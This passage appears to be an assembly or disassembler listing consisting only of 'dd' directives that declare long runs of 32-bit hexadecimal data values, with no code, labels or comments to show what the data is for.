		dd 261241AEh, 0E624E68Dh, 0FEAF0CC4h, 317587EAh, 0EB469DDDh
		dd 54BF8433h, 8D400E98h, 1FEC83EFh, 0A07CFDD8h,	0D7DEE31h
		dd 0F366312Bh, 62375FC8h, 0A294364Fh, 0FBF415F5h, 37582D35h
		dd 46E318D0h, 0A5CFD442h, 3228ACADh, 7863D0C7h,	0D68FB05Ah
		dd 0FCDDA1E9h, 4D6C50Dh, 828F718Ah, 7CFB0517h, 5F3168A9h
		dd 7A4E58B5h, 0CA71897Eh, 0B1947EAh, 5B22F4FCh,	0CBF0C2B2h
		dd 0FC10B05Ah, 5571E76Ah, 0B065FC4Fh, 0B1B5591Bh, 0EB5348E9h
		dd 39736C0Fh, 41CEC7ACh, 6B64542Fh, 0E9ACC7C2h,	0FE8ACDE2h
		dd 29188C98h, 0C64DBA5Bh, 0B033AA1Ch, 6A478CFEh, 0CC2B5B3Ch
		dd 6C6FDB54h, 36C682B4h, 0C64EDF1Fh, 199AD457h,	0EEA8D3CBh
		dd 5DDE52D1h, 0E89B3B8Ch, 0D7EC88ACh, 50C8CEh, 547AABDEh
		dd 0C123562Dh, 0CBD10FC3h, 0BE330AFh, 4F00192Bh, 2B68A8A0h
		dd 0F978971Bh, 4ADE882Bh, 270E5D8Bh, 0F9CA0A5Fh, 0B51D6C49h
		dd 6D7FB432h, 0E8BBD3C7h, 3A417F03h, 7BE36CAAh,	3AF348Dh
		dd 0AB6B2794h, 4CFFC5A7h, 0CEA953F6h, 258B4DFAh, 1A8A9616h
		dd 6A042F55h, 0CC706D57h, 0E395C5F4h, 4A16F024h, 19CBBD3Fh
		dd 8E796D53h, 9CA8FAB5h, 86FBD5DEh, 6CCCF1Fh, 0C69028D5h
		dd 6AEF655Fh, 891D70F1h, 4F72E88h, 269C9605h, 3C0AE8F1h
		dd 7D96D5F6h, 0A395FFB9h, 0B046262Dh, 54C5F07Dh, 0DA2F2FD1h
		dd 0A7BAC338h, 5414C07Bh, 0FEB44421h, 5FFE6DECh, 89687711h
		dd 0B492AB0Bh, 23FADCAAh, 0C2FD974Fh, 0F93F772Dh, 93682AA2h
		dd 294BB3F2h, 55433DA3h, 85E58855h, 905B527h, 5A7D16h
		dd 0FF5E52EEh, 57A430B1h, 177A2084h, 29E412C8h,	7A63BBEBh
		dd 0D731EB3Fh, 302FFEA8h, 1A5ED930h, 0FCB2FD27h, 171BEECCh
		dd 52B71209h, 0AC8B9F4Eh, 6734EDDDh, 0BA547254h, 9F58C489h
		dd 5CB56548h, 93EC083Ch, 87D93954h, 1DCC647Fh, 25B254BEh
		dd 0B83C0FAEh, 0D4FCACC3h, 21553818h, 8B5FB5CEh, 0C3197B33h
		dd 0F72805D2h, 0AA2E62F0h, 0CF890FDEh, 51E0F60Ch, 7DE5D7D7h
		dd 0F329BF60h, 3E0DF30h, 36739F67h, 0D7C1A244h,	0DEFA71B8h
		dd 0EDC02807h, 5D5B337Dh, 3CA3D7Fh, 7F948667h, 816A3FCh
		dd 458955F6h, 26FAA911h, 7A9350D7h, 3C2AB32Ch, 9A72A2DEh
		dd 559BBCF9h, 5B1BB688h, 9DFD0927h, 0E6042CB0h,	0AE4F84BFh
		dd 262C6E0Ah, 0D1492647h, 4F5DB37Eh, 0E87E2F11h, 0EE50BBB3h
		dd 0C79C0221h, 6FD3514Dh, 71862071h, 901575B3h,	1467B0DBh
		dd 78F991CCh, 1E049381h, 7F1B2AA4h, 7851AF6Eh, 8ADAECF0h
		dd 2E7F067Bh, 0BA64AB82h, 6A5C26E0h, 0C67FE2FEh, 587EFA82h
		dd 1952BEB7h, 388C3EFDh, 3F7FD3Ch, 0B3BE944Bh, 1E32EAEEh
		dd 1333FE0Fh, 0E26068A7h, 341372DAh, 92E3EA10h,	0E5A68768h
		dd 0AA973516h, 3ABCAA56h
		dd 2EA50B6Fh, 0D9B3EB73h, 0AA56CA97h, 0DFEB21F4h, 360AF49h
		dd 0A5170C47h, 3AB49229h, 909FF7C9h, 98037F20h,	0CAE112EAh
		dd 7A212D9h, 9C69F8EBh,	0F8BDD968h, 0BAC830FCh,	9A5C64F2h
		dd 687EDDF1h, 0F4757370h, 0D60D2735h, 8781A534h, 2193F553h
		dd 0DCBEE14Ch, 2B6CAF5Fh, 67C8017Ah, 897D5F9Ah,	0FC6A624Ch
		dd 9968CA2Bh, 0DF2426C6h, 2918CEF8h, 0EE7A96B9h, 41189B8Fh
		dd 278A5ACDh, 9572DD7Bh, 5C1F6652h, 1A2C6468h, 0DCD53430h
		dd 13FD91ACh, 8966567Ah, 859FD726h, 5A57C78Dh, 258A0C8Dh
		dd 0FBAC9084h, 79E8E54Ch, 34B8809Ah, 0EB0FD5E0h, 0ADF61E0Eh
		dd 0E6ED2BA7h, 0BB5F5B0Bh, 199D7064h, 386E7742h, 0E9F179B8h
		dd 0B0F598A1h, 0A19CE1ECh, 0F55A3F82h, 87C8B44Ch, 0DCEAE7DEh
		dd 6BE56677h, 0DA380566h, 0C61DC3A9h, 0D510588Ah, 945F9880h
		dd 0D657CEB6h, 7B6197EFh, 0DD58558Dh, 0D9E86FC3h, 0BFC1EA3Eh
		dd 25544E46h, 2C8AF52Dh, 0B7F0B76h, 4703BFCEh, 0C78EA11Eh
		dd 4A4DA0C5h, 5FC71A95h, 6427168Eh, 14F0108Ch, 8A818061h
		dd 0A2684C79h, 958823Fh, 8496E43Fh, 4321FF35h, 0E69ABA4Bh
		dd 6063C72Ah, 0EE91337Ch, 9B759C45h, 229D9500h,	0C6245571h
		dd 29DD71F6h, 71500FD6h, 3D1F1B7Ah, 0A1F57540h,	9DF7F245h
		dd 0A8CAAB07h, 82CC82E1h, 936BBD89h, 0D177165Ah, 43364042h
		dd 4A22972Ch, 0BCCBAB82h, 0B6DAA5Ah, 865928F7h,	7B3672Ch
		dd 7C1F7AB6h, 9DCD88FAh, 0FBDD0CFAh, 292F6238h,	0B79F020Eh
		dd 0E4BFC0F3h, 0C4D6CECFh, 5F1BFBA5h, 5637BDD5h, 4E3D2F0Ch
		dd 0A4F91E14h, 16BC028Ah, 0F821270h, 0C959F09Ch, 3EBAC905h
		dd 0E8BFD932h, 0F6A9DD17h, 0FC3CC3E3h, 2389D0D8h, 7D10166Bh
		dd 5D7BB66Dh, 0ACE5F35Dh, 0C4055C88h, 0CB969B4Ah, 1C4454F8h
		dd 0E642E6C7h, 4E35D933h, 2319E08Ch, 7E58EA94h,	82EE3AE7h
		dd 0C0AB5FF1h, 0F9DF6D9Ah, 1598754Ah, 0F11CBC77h, 7647DA43h
		dd 9C93FA03h, 757B8ABBh, 0ACEB2A96h, 233DE32Eh,	0BC2C9BDDh
		dd 5BE5EDA1h, 62D11C8Fh, 2FC74CAFh, 61F8CFCAh, 0E7928A5Ah
		dd 527E6CC2h, 0F2AF3352h, 348F32DEh, 0D22098CCh, 2E2D4DF5h
		dd 55C9B045h, 0B4D496ADh, 0E6ADBEh, 1F5D6DA7h, 5C7B339Bh
		dd 6F118B94h, 4D7C9023h, 5D5D5624h, 0DF5D364Fh,	92A58CD4h
		dd 0D5AC3FEAh, 0C3118A74h, 47FC7C51h, 0F03B48BFh, 0ECB389E1h
		dd 0C3853115h, 299B1B25h, 2B4772DEh, 49089E8Fh,	0CF3EE2AEh
		dd 714E76D8h, 0F0952EA1h, 0C398FBCCh, 0C74D04CAh, 89063CEFh
		dd 0AB0A9089h, 586A46BAh, 0B5EF155Dh, 60E4BB3Dh, 3FCC74E6h
		dd 9B9CBCD6h, 0BCAD148Eh, 0AE80B471h, 47378A24h, 0CEF4F0A7h
		dd 0A043AAB1h, 0FC4BFAC4h, 57A52F3Eh, 80846FA0h, 465B571Dh
		dd 0AC9293ACh, 2F9DBF6Eh, 5585CD86h, 5C69BD5Ah,	0E79B420Fh
		dd 0C2A88CB5h, 9F73204Dh, 3A03BA1Dh, 0EA0E2677h, 16C021D2h
		dd 0FC30E2F4h, 275FB3BDh, 51CC3DBAh, 96941DB5h,	900BB86Ch
		dd 0BECEF922h, 12517556h, 0A947DBABh, 2D032DB5h, 6FE0B897h
		dd 615F1C3Bh, 5225CAA2h, 57545522h, 3FDA09F9h, 7C07AFE9h
		dd 0FEEF63A4h, 0DCF8E5C1h, 0E626B96Dh, 0A559E88Ch, 1FED2884h
		dd 0E0CBCC0Fh, 0F1582D83h, 0C31F9E8h, 9E019E14h, 19CED2E9h
		dd 6B445AD1h, 0A0CA2215h, 0D4C1F7B3h, 6898B889h, 0F5FDA4AFh
		dd 0B6C5A168h, 0B5157FA2h, 0D4D7FB2Ah, 6834D707h, 0FC8CEA59h
		dd 9796B7FEh, 0CBC4D74h, 72EE894Fh, 0AAD62AFEh,	0CF871C0Fh
		dd 0D68055C4h, 70E0C466h, 0FDDAE452h, 6BBA3123h, 0A5B80EFFh
		dd 0AE0165D5h, 0EAA6EE78h, 5DBF0E1Fh, 16F3F940h, 0ABA941CEh
		dd 894F37C7h, 0F24EF396h, 9DC49553h, 0C51FE559h, 0C0FBF86Ah
		dd 0ADA41B60h, 1B49BA79h, 28B688BFh, 0F078FDB4h, 923084A3h
		dd 83599F41h, 0BDFF92D3h, 0E29039AEh, 0A03B80B3h, 0AFF4542Bh
		dd 6C49BA88h, 3BF3812Fh, 47FB1D9h, 148E1D48h, 525F57Bh
		dd 0D30E83A9h, 0CDD8D9D6h, 0D5B173D3h, 2D519500h, 0CFE8CC50h
		dd 0D0A390C0h, 0A74B5558h, 9F66168Ah, 78B7BAF1h, 0A0B562B8h
		dd 811307DCh, 0D62B7136h, 591EF5ACh, 6B2355B7h,	4A8A8126h
		dd 0D09B5F3Ch, 0E76BE8F0h, 0F52FCB27h, 0CC43D927h, 0EED5E6C2h
		dd 0A0A751E5h, 19DE2D6Fh, 9054F2Dh, 91A7AB63h, 52C53226h
		dd 8B9F744Ch, 0F556B23Bh, 453140FEh, 7905692Eh,	0A14DABBAh
		dd 0FA52B44Ch, 0EA9B33B5h, 0A31F6EE0h, 1EF3244Ah, 11581B65h
		dd 781A72C9h, 221C94FAh, 0B8BE59CCh, 62A26B91h,	0F740F315h
		dd 2F47C42Fh, 0CF74A5D6h, 317FCF29h, 3C105B6Fh,	278441F5h
		dd 63E4FB45h, 81A2DED2h, 35C8EA83h, 4B29FB5Ah, 6AEA4599h
		dd 2154FE03h, 9B674E85h, 5DA3628Fh, 7E62A996h, 0A53272D7h
		dd 81C688Dh, 8CEA56BAh,	0D969BD1Ah, 789A2E35h, 168CBAF0h
		dd 0A69DE7B2h, 0F5EFBC7Ch, 8DB7E136h, 86F44263h, 1DEF4425h
		dd 0A0AE70EDh, 4A13349Bh, 0CB9F9A28h, 4F1EAF3Bh, 5919E6A8h
		dd 0E2BF06AAh, 718BDD4Ch, 119215CDh, 175E7317h,	0E6AE303Eh
		dd 452B558Eh, 0FBBBF2E2h, 0D9555D0Fh, 43F043D8h, 8880F6E1h
		dd 0F9C7139Fh, 0AAE746F8h, 0B0B85CABh, 0C60EDDF7h, 8FF69606h
		dd 4AD1AD17h, 57D5B0A5h, 385E5ACBh, 9072F20Ah, 1D03FC40h
		dd 717FBFD6h, 7258F1CFh, 857F8FB8h, 0F1025BDEh,	0F7542023h
		dd 0E6B96274h, 905155E8h, 0A6382E82h, 0EA0A7992h, 0F0C6ECEAh
		dd 1BA13981h, 2B5D30B3h, 5F8373BCh, 603237B2h, 8D0DBEBCh
		dd 0E7AB4F47h, 0B7B68BE0h, 21FF8FE4h, 0BA0B7B60h, 0ED4511EDh
		dd 0A89E8B01h, 78B7981h, 0F1B0ACCFh, 4C9F0291h,	326A3E0Dh
		dd 8DCA62D3h, 44BEE38Dh, 5500ED1Bh, 99649DB5h, 3494BBF3h
		dd 3B44E921h, 5046B3FAh, 7AD3B55Bh, 0F3354A4Bh,	0ADD36502h
		dd 0D9DF0694h, 98A2AA28h, 28CA2EEAh, 1B036B63h,	0E42272F4h
		dd 0F26D883h, 0B46CB50Eh, 85741553h, 79FDF95Ch,	0BF8F9E8Fh
		dd 0B871D4DCh, 3CB2D1E9h, 0FCB3B1F6h, 0AC7CC2A1h, 86BD55ECh
		dd 1698A7C7h, 8EB9AEA4h, 1DCDA42Ch, 0B43EB20Ah,	0EA419E8h
		dd 64639683h, 0F0AE7E8Fh, 0B91592D9h, 0D72E56F4h, 97A4018Ah
		dd 18698BEDh, 372C3331h, 0DD0CC5A5h, 0C0B60FAEh, 39C3FBE9h
		dd 7AD5BBEAh, 0DE89B1C3h, 0CBB7BDECh, 5E08067Ah, 357E5117h
		dd 67FAD05Ah, 76B44A1Ah, 0D5741F2h, 2B15E9B6h, 0CD3C2466h
		dd 0E81E5FCDh, 44F39B75h, 0AB7B04CBh, 9E4428D3h, 4257A54Ah
		dd 4651CA29h, 621F7278h, 2ADB2EA4h, 98E58297h, 0EF947A29h
		dd 1A75DEB5h, 0DB53AAA4h, 0BD83CFFCh, 0BBF6B9EAh, 0E122A4BBh
		dd 0B315AA62h, 8A2861DCh, 0EB7FA840h, 2B9EB3DFh, 0F9CD2017h
		dd 0F8D04F06h, 0F6AD29BBh, 0FEF8D0B3h, 0DDB87192h, 0D7C1E7D6h
		dd 71D2FC7h, 75512A1Ah,	64514635h, 0EC0F1B1Fh, 4CF3D54h
		dd 5BF99BF3h, 97D62D48h, 0B03DC5A3h, 8ED3B1E4h,	2DA31636h
		dd 0E6BBC31Dh, 262A1C2Dh, 87E3FB55h, 40C4D9F3h,	34316B93h
		dd 1DB4B45Fh, 853BEEF6h, 31861ACDh, 62B85CC1h, 0E653D11Ah
		dd 7CB92FD9h, 0ADC7D805h, 2A999DBh, 564C1A29h, 0BDB8E7DBh
		dd 114A134Ch, 773057B8h, 46666F70h, 2D6477D4h, 1CD78ED3h
		dd 50AE2EA0h, 2AEA9D12h, 0C6FB7A59h, 0D969C215h, 305C6079h
		dd 71713D2Bh, 0E354CCC6h, 636BF917h, 8C71B252h,	3BBE65F0h
		dd 0CABF1561h, 95A5D40Fh, 15B612B5h, 0D6E6E251h, 3EEC142Fh
		dd 0CFEEE675h, 76E05FE4h, 0E0EC626Ah, 96B3749h,	255DB51Ch
		dd 0AA25BD84h, 471D5FC8h
		dd 0F97516BDh, 5ED61FEEh, 1744D1B3h, 1D257B09h,	3FE58DFCh
		dd 0BC7ED0B9h, 0D6C56015h, 88AE27E7h, 0BCFFBD9h, 950CA69Bh
		dd 704BB531h, 0B6A964D8h, 0DC5FA9BBh, 0F754D269h, 326B0B0Eh
		dd 28954ADh, 0C3F14C4Ah, 1183E8F8h, 51A03F8Eh, 4BB44FADh
		dd 3BDB2CCBh, 97376672h, 93535764h, 0C9600AF6h,	0AD5C2205h
		dd 5F957E53h, 0D3BB6244h, 52786BE2h, 0FAA3E5FDh, 4B2F6E2Fh
		dd 9EE1CC4Ah, 0E5D557D6h, 89CE0FC7h, 2B884D6Dh,	0D2CC5A61h
		dd 0D5F2DC8Dh, 7872877Dh, 55088B28h, 71D89255h,	0E7FA16E5h
		dd 0B6D49647h, 8823C828h, 9F3D8578h, 6FEBCB8h, 4ED1B8CBh
		dd 58E24F45h, 0F11E31BAh, 0CE8295B7h, 42E9BF7Ch, 1193E117h
		dd 0A14C8A95h, 0E88ABA66h, 7368CC1Ch, 0A67F355Bh, 0AF4C9F58h
		dd 0DABF24AAh, 4AEF24F0h, 774E9190h, 0C9770973h, 0AD34E6Dh
		dd 7C07BB11h, 844FFA28h, 0C1F1B5D8h, 0B934B50Fh, 73196AECh
		dd 0AFDBE24Ch, 0C0F85890h, 798F4906h, 6A6B7573h, 5B7DA7B2h
		dd 0C2859A87h, 0D1AD0AE7h, 0ABC4ACCFh, 87F5B29Dh, 0F5B4B568h
		dd 0E39EE5F6h, 2BA632B1h, 7BCBFFB8h, 0BC53D351h, 7E99DF30h
		dd 1BC0168Ch, 0E1535429h, 19B014C7h, 92AC79CCh,	71ED22BBh
		dd 67E8335Ch, 0B26759E9h, 9F8C1B73h, 54965145h,	91CC36AFh
		dd 492A90F3h, 469AA1A2h, 90BED81Fh, 0AFB1D90h, 0BA4C945h
		dd 0B43C78A2h, 85021679h, 1663176Dh, 3A6407C3h,	0CC03CCC0h
		dd 30A0A2BAh, 4A7192B9h, 2C0F451Dh, 0C9C13376h,	0D3E9063Dh
		dd 0E5B83C50h, 0B9BB9281h, 5A2CF3AEh, 0E0FCA501h, 3E95A4B0h
		dd 5BCA82ACh, 0C8345725h, 785BB11h, 0A0CB1A5Fh,	5BB59F5h
		dd 418BDA7Dh, 0CDA3ABC6h, 0A179E380h, 48577581h, 0FC3E1689h
		dd 3AAF3EDCh, 0F8B6570Eh, 34BF6B29h, 2CD0186h, 89F26D59h
		dd 9B5F9471h, 0BCB8D8C7h, 47C1FEAEh, 19713782h,	0D3375E13h
		dd 3FDF11A4h, 4B267061h, 0A3E47C63h, 0F1FC06F0h, 4645706Fh
		dd 691F25A1h, 0C4BCBD71h, 3F6BC153h, 31CE84B0h,	0ABCBBE23h
		dd 0AF199F1h, 0AFCC93E1h, 0A17A42E2h, 4B98B4B1h, 0B23306E3h
		dd 0AA44419Fh, 54E11BEBh, 451E9129h, 0A4A89AF2h, 0F70857BEh
		dd 0B232DA20h, 9D35CE32h, 4B875D13h, 6968FB04h,	0C21539DAh
		dd 42E3F2D1h, 0AC9A843Ah, 0C99AD7B9h, 7954C2EAh, 0F634BB45h
		dd 35D91551h, 749BC75Ch, 18B75D13h, 0CEA10867h,	0F75A4B6Eh
		dd 0FAB9F284h, 0DCED7E0Bh, 0CFD49BC8h, 7C0E74BCh, 3683C733h
		dd 7FBADB45h, 98AC9159h, 6D036D17h, 2D8643FAh, 4567C8D5h
		dd 8C952AB1h, 38A8EE7Bh, 0D14A17E5h, 0D61A5A36h, 357E549h
		dd 716E0815h, 367D0FC4h, 301E2CC8h, 0C3F6F139h,	46FAF46Dh
		dd 3B833E94h, 55DF2BACh, 0D941CE88h, 92B0C972h,	732857A9h
		dd 529BD972h, 312ACEB5h, 0B31B6B0Ah, 0A4BE244Fh, 0FC515243h
		dd 339940E6h, 67E39544h, 7F31644Bh, 3B5A571Ah, 5708C231h
		dd 0D31CD3AFh, 0B0D45F21h, 3115C555h, 0A213A145h, 0DFC175A2h
		dd 0EB584A8Eh, 73B6F707h, 9D963215h, 5B49E8B6h,	4A5B52E4h
		dd 53FEAD69h, 49D8B04Fh, 0D33B5105h, 0F5462965h, 2CD8280Eh
		dd 1AA84BF1h, 597D1D4Ah, 61693B35h, 63C6AC6Ah, 0B268E0FBh
		dd 8437FF4Eh, 6C39939Eh, 4F346EAFh, 2F970477h, 0B85CF3FCh
		dd 771882FFh, 0FE1E2301h, 0CD029C5Eh, 83F9665Bh, 3E580641h
		dd 6F126438h, 5D678D7Dh, 0C094E7D5h, 9375009Eh,	0FB39016Ah
		dd 264054F1h, 85BCB236h, 0CF6D0E5Eh, 7E9A44DCh,	2505153Ah
		dd 0BD85BECCh, 0AB6867Dh, 9FADFF5Ch, 0F2239D0h,	617B19FEh
		dd 228B24C6h, 0A01EA06Bh, 4BB5B810h, 0BFBF415Dh, 8CB936B9h
		dd 6F280AF9h, 1BF576DEh, 0A7FE743Fh, 0E93C932Eh, 73C1DC4Bh
		dd 83AB4348h, 0D8ECAD92h, 0C306F056h, 0DE090F2Eh, 5671EC6Ch
		dd 0B9342980h, 0DE8C2DCCh, 0FAACE954h, 9B2C64D6h, 85DC1D17h
		dd 92C6462Ah, 0DC4CF40Eh, 1BAF3124h, 406153Eh, 82D16D7Dh
		dd 29B57D16h, 646ED4FEh, 0C593A53Fh, 0BA004FE8h, 0CE9DA45Dh
		dd 0E07E60BBh, 37AFF8EFh, 44376468h, 7CA02311h,	11A33598h
		dd 3B916E2Dh, 0ADB0E22Fh, 9519CE5Bh, 0A8C50DAEh, 7A76FC2Ah
		dd 918D9108h, 29B7BAAEh, 0CDF910A4h, 3797B84Bh,	0C5415D68h
		dd 0CBD8F7Bh, 29CA0749h, 0F179C7F1h, 5B205814h,	0C67A3DB1h
		dd 0AEE8F4CAh, 6751FF35h, 550FFA9h, 9D7B2297h, 598ED46Ch
		dd 17F6812Dh, 0C555221Dh, 57AEC92Dh, 8EDE57A8h,	69604BEDh
		dd 0D026CB46h, 5DAD99A9h, 93187E0Fh, 0DCE4BAB4h, 8897999Bh
		dd 0FC078B3h, 183807DFh, 1AF9B8h, 0E35283ECh, 34C93ED3h
		dd 3799B607h, 0EC3C0350h, 0EE20DAC1h, 0E1BB2A58h, 3E330926h
		dd 25E50497h, 60719D0Ah, 323B46F5h, 752D65F1h, 5445AF14h
		dd 52031BCDh, 0AE42F792h, 0C0AE55FAh, 2DF7F578h, 3463662Fh
		dd 0A3520AE9h, 5A774BD5h, 0FC1CAB9Ch, 98A8F190h, 126B6564h
		dd 1927D7EDh, 73157BEDh, 6BE17D50h, 52963E43h, 0CF81D5B4h
		dd 0FD77ECF4h, 62928AA2h, 197D2BA8h, 0BA7BBE40h, 0ED2AED1Fh
		dd 8D2D170Dh, 0F2B9AF8Ah, 0BB5D697Ch, 35CC409Bh, 0E9EC87D7h
		dd 0B8BD9DC5h, 0D1F5C149h, 59DBEB2Ah, 7866D615h, 3F29ADB5h
		dd 0E3C44009h, 0DA5992C6h, 631216D1h, 17DB3ED4h, 8547A9E8h
		dd 0E86C7754h, 0D130D5F8h, 39C1DEEEh, 9485C1E7h, 2AA78AAFh
		dd 9C7B2F7Ah, 0D536AAB3h, 52E63983h, 0E71B773Dh, 0D175FA1Dh
		dd 32A8EEAEh, 3D8D4CE6h, 5BC84B29h, 8FBE92AEh, 85FDCA59h
		dd 6C4BD77Ch, 175CD18Fh, 0FCE39006h, 343A0595h,	0D2D6CF8Dh
		dd 5A238A5Dh, 0CB794D19h, 0B99A4EDDh, 15BBA46Bh, 0E9CF316Fh
		dd 0BF203DEh, 2C568BFFh, 0A5F1A1D1h, 0EEDF30Ah,	9D9B4525h
		dd 0BB171692h, 0E3E6C798h, 0F2D55318h, 3DD32157h, 0D4CD1C5Fh
		dd 0BCB6A6A8h, 98BE15DDh, 415DA04Dh, 6A0249CCh,	0F001ABEh
		dd 1A028EAEh, 2CC010E8h, 787231B0h, 7E19DA34h, 0FDE662BCh
		dd 5EBCDC45h, 8962ADB4h, 459B3AE4h, 0BC742BACh,	15851863h
		dd 0E66FA3DCh, 689F9662h, 9EB999AAh, 0A722E0DAh, 9ACACBCAh
		dd 86DA956Ah, 0B52E9D6Bh, 841236Bh, 25DF98CDh, 0DFF1536Dh
		dd 0E4A3A0BEh, 6B3CDDB0h, 20B1F0E1h, 0AD10B5D2h, 857B6F55h
		dd 0D1601D9Ch, 0BEDC24BAh, 74ADA299h, 324DF589h, 0FA58E23h
		dd 884919E1h, 8E939220h, 62238871h, 1F1C41AEh, 2A8D3E7Ch
		dd 0D5D95DC7h, 805FE078h, 90935637h, 0E156E449h, 9E7D9933h
		dd 48679A40h, 6AD7D429h, 3D7FF0C2h, 0C9401328h,	1D0F2E56h
		dd 4B4475CCh, 82EC802Bh, 6F426B6Ch, 8A7EF325h, 145D30F0h
		dd 5C0A0F85h, 11381211h, 72EB4C05h, 0E62C4A4Fh,	445A2BB8h
		dd 725EAB69h, 187EBBBBh, 0E4FCB83Dh, 9E62A86h, 848D4ACDh
		dd 0EC539AFCh, 0BBE6CD6Eh, 0D607D537h, 7EBFEC15h, 0B3B83B0Bh
		dd 0FDF3664h, 956DEE92h, 0AC6FEF53h, 0BF274CABh, 0CA088BBDh
		dd 0C5822DD6h, 868BBDB5h, 62027DB6h, 255F4E95h,	1ABFABDAh
		dd 0FA26A9FCh, 66042B9Eh, 619F5FFCh, 3F05BAB4h,	0BEA46BBCh
		dd 0D4791E57h, 67928CC1h, 0EDB99044h, 781434B1h, 0ECEA5F7Dh
		dd 94F8EA22h, 8F7F1408h, 0C7035EB0h, 85F155CEh,	0B8F0E03Eh
		dd 5C789BDAh, 15D3D16Ch, 0F7646D94h, 4AEED768h,	0BF249B39h
		dd 6E813D77h, 0A6C2099Ch, 0D159FE81h, 0D33AB1F1h, 4777C6B6h
		dd 51AFF39Dh, 0ED0B8A82h, 1C08E96Dh, 4482FCF7h,	0B18551DFh
		dd 0E46C6951h, 0FF2A66A1h, 781D030Eh, 83C191EDh, 88E3A9EEh
		dd 0BCF8136Fh, 0DF9FFD7Ch
		dd 23D2B09Ah, 808C7BD3h, 0F2B65C21h, 8DB78DCFh,	98547628h
		dd 8F79EE8Bh, 842BD753h, 3AC36434h, 0BF3C082Dh,	5785D699h
		dd 0E28F7265h, 0F530D6CBh, 0C5B3E07Ah, 93AC20C4h, 0A0B5ACF9h
		dd 8872E7F2h, 0D69E70DEh, 295E6B6h, 7C934D76h, 0EDDB23F5h
		dd 350A972Bh, 0B45FD8DDh, 0EE4A61F0h, 37DEDDD9h, 9D7087E6h
		dd 5C3F6EEEh, 556279F1h, 0ADE72317h, 8C42702Dh,	6ABE4272h
		dd 0B0A69488h, 0CE3180E9h, 0F81E5A08h, 798A24EBh, 0F3D07EC6h
		dd 4550A717h, 3D93EC70h, 964BEE22h, 4533967h, 7011C0EEh
		dd 78738A9h, 0F2BBAF94h, 0E5A59CC0h, 751D9E4Fh,	6757485Ah
		dd 0EA959A11h, 9CC358DFh, 0A64DA2BFh, 8118E254h, 0F3B9B6AAh
		dd 7F0D95BFh, 0A33E9DEEh, 0F1949AD2h, 0D7687741h, 2A3773D2h
		dd 4EFF696Dh, 0B4BBE647h, 0D4938DAEh, 65F7AEACh, 0A58F3E0Dh
		dd 8B2B9B6Ah, 9FA978F9h, 8FC0E61Ah, 0D5B503A9h,	65D8124h
		dd 0E07C2D3Bh, 643663C1h, 414619E8h, 0B2310ACAh, 0E57929CDh
		dd 29C4AA73h, 42A459FBh, 9D8DB01h, 17592E72h, 0A69BB78Dh
		dd 0F72A596Bh, 514D175Eh, 0CADFCAFFh, 959F128Eh, 2D2D0E9Ah
		dd 97DBCCB6h, 0A6B23256h, 0CD49824Fh, 0ACBCD198h, 5373C3Bh
		dd 562D0A4Bh, 0EFA36AABh, 0C77DD338h, 0F93401FFh, 0D6A97867h
		dd 0ACE545EBh, 83BBD7CDh, 73C75DC9h, 1A990B18h,	617C6BACh
		dd 0CBB7B102h, 0A63F1C9Fh, 7EFDEF4Dh, 0D4F927CDh, 7E99246Fh
		dd 72CEB236h, 0EDE8812Bh, 27F06FD6h, 0D84AB63Eh, 0B99F6594h
		dd 83E938DDh, 0CD4B7A1Fh, 0D99641DBh, 0DAE8F701h, 56F020ABh
		dd 4D1A45FEh, 72A9ECh, 567196AFh, 96CDEADEh, 62B05D3Fh
		dd 451A66CEh, 398DB0D6h, 5DE74394h, 0D39998E0h,	6998153Fh
		dd 0C325EAD5h, 0C96008FAh, 0CA7D89E5h, 5BE7C5Eh, 20C9AF72h
		dd 3A477CA3h, 0E6C15688h, 0E91D49C1h, 0BB43F03Fh, 768E5F8Ah
		dd 0A524E1E2h, 812F4BE9h, 58A64229h, 3F33F5FEh,	617FC5F8h
		dd 0B7647ECBh, 0DC7A8F73h, 7190E5C0h, 0B9312F11h, 0BB498CACh
		dd 2C418E2h, 0D50216A2h, 7A3D617Fh, 0D4D35F31h,	41A93AAAh
		dd 74AB6C2Dh, 0B14E409Ch, 2A5AD13Eh, 62CE0FA2h,	3B2C7337h
		dd 0B5CAC5F6h, 0FD99EB92h, 308770A3h, 26DADF62h, 9D4ED6EEh
		dd 3C687DBh, 0A1D2074Fh, 5AEDA169h, 5943A6B2h, 82ECDC5Dh
		dd 0DAF04150h, 450011A6h, 0B96BECB2h, 3529BE99h, 2E4499B8h
		dd 0E3E86C61h, 85DE5EC5h, 3C5CF09Dh, 5F21FF78h,	2EC135C9h
		dd 15471898h, 0F74FC50Dh, 686CDD4Fh, 649B7799h,	27B3B856h
		dd 0C8DC1B45h, 97420DB1h, 9159156Bh, 0EFD71F8Ch, 0A79043C3h
		dd 0CFE1B479h, 49964FD2h, 0ED9EB890h, 410CB66Ah, 67EBB6C8h
		dd 0B706BB43h, 0DEFDFD09h, 0ABBB87E1h, 4F5296EBh, 73151396h
		dd 0BDD5B1D1h, 9784ED30h, 38240272h, 7B9BA6CAh,	0F6BAA34Ch
		dd 9B0A6D97h, 77CD1511h, 6B15BB3Fh, 25E9572Ch, 7CD0D55Fh
		dd 0CC9A5B4h, 4CE791DDh, 0C136E545h, 0C1DAC16Dh, 0A9DA9E26h
		dd 4B576B2Dh, 3C702B76h, 6ED2507Bh, 7FEDCC34h, 3F725F87h
		dd 26F66C79h, 1590F027h, 0D7A3FCEEh, 0E4F13337h, 0E0462F50h
		dd 37D245BCh, 15FD8ADh,	0FF627986h, 1E87B394h, 89DB2458h
		dd 58E19E89h, 0EB48B428h, 0CAF3681Dh, 60EC3A52h, 0B6A17D49h
		dd 74BB2901h, 69C157BFh, 6CF22B37h, 0F6958777h,	0F82A2704h
		dd 0A6F9FAA1h, 0B95A0531h, 6FB55A32h, 9519A6C0h, 5151991Ah
		dd 0A1617E34h, 9D4FB953h, 49045097h, 68C5E095h,	7D06CA47h
		dd 76CBFD63h, 393A54CBh, 0F6ECC18Ah, 0E607EEBEh, 0A2669E3Ch
		dd 0A2ACD1D1h, 0F2CFB94Ah, 54F5A5F9h, 4504212Bh, 0A051D5E8h
		dd 6CBDE64Fh, 0B2E6DCA3h, 24F01499h, 66672559h,	11315B1Eh
		dd 0C3B7C163h, 2C7B6A23h, 6B7E16D8h, 85064DC4h,	0D55FC8F1h
		dd 0A4CC2874h, 0D81B05A4h, 22A1D1BEh, 64FB449Fh, 7DB35E07h
		dd 0D66B4D2Eh, 2C3013E3h, 0CBD65EB8h, 42ED1A5h,	290C2539h
		dd 0ABDF5CC5h, 7796F40Bh, 7A6BC95Bh, 0FD384B62h, 381FB6F6h
